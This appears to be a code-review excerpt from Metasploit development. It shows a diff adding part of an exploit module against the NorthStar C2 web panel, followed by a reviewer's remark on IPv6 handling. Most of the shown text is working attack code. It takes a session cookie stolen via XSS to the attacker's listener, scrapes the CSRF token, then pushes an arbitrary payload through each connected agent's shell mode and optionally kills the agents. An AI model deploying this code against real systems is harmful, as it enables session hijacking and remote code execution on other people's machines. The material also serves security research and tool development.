modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb

```diff
@@ -0,0 +1,237 @@
+      if script_tag.text.include?('csrfToken')
+        csrf_token = script_tag.text.split('"')[1]
+        break
+      end
+    end
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find CSRF token") unless csrf_token
+
+    vprint_good("CSRF Token: #{csrf_token}")
+
+    agent_table.rows.each do |agent|
+      agent_id = agent[0]
+      hostname = agent[4]
+      print_status("(#{agent_id}) Stealing #{hostname}")
+
+      vprint_status("  (#{agent_id}) Enabling shell mode")
+      agent_exec(agent_id, csrf_token, cookie, 'enablecmd')
+      vprint_status("  (#{agent_id}) Running payload")
+      agent_exec(agent_id, csrf_token, cookie, payload.encoded)
+      vprint_status("  (#{agent_id}) Disabling shell mode")
+      agent_exec(agent_id, csrf_token, cookie, 'disablecmd')
+      break unless datastore['KILL']
+
+      vprint_status("  (#{agent_id}) Killing NorthStar payload")
+      agent_exec(agent_id, csrf_token, cookie, 'die')
+    end
+  end
+
+  def agent_exec(agent_id, csrf_token, cookie, command)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'functions', 'setCommand.nonfunction.php'),
+      'method' => 'POST',
+      'headers' => {
+        'cookie' => "PHPSESSID=#{cookie}"
+      },
+      'vars_post' => {
+        'slave' => agent_id,
+        'command' => command,
+        'sid' => agent_id,
+        'token' => csrf_token
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+    # 1min seems enough, NorthStar mentions 4_000ms response times...
+    (2 * 60).times do
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'getresponse.php'),
+        'headers' => {
+          'cookie' => "PHPSESSID=#{cookie}"
+        },
+        'vars_get' => {
+          'slave' => agent_id
+        }
+      )
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      if !res.body.empty? || command == 'die'
+        vprint_good("    Command sent successfully to agent #{agent_id}, response: #{res.body}")
+        return
+      end
+      Rex.sleep(0.5)
+    end
+  end
+
+  def on_request_uri(cli, request)
+    if request.method == 'GET' && @xss_response_received == false
+      vprint_status('Received GET request.')
+      return unless request.uri.include? '='
+
+      cookie = request.uri.split('PHPSESSID=')[1]
+      print_good("Received cookie: #{cookie}")
+      send_response_html(cli, '')
+      @xss_response_received = true
+      steal_agents(cookie)
+    end
+    send_response_html(cli, '')
+  end
+
+  def xor_strings(text, key)
+    text.chars.map.with_index { |char, i| (char.ord ^ key[i % key.length].ord).chr }.join
+  end
+
+  def srvhost
+    datastore['SRVHOST']
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if srvhost == '0.0.0.0'
```

Comment:
This won't account for an IPv6 address. The IP address can be normalised and then checked for zero: `if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0`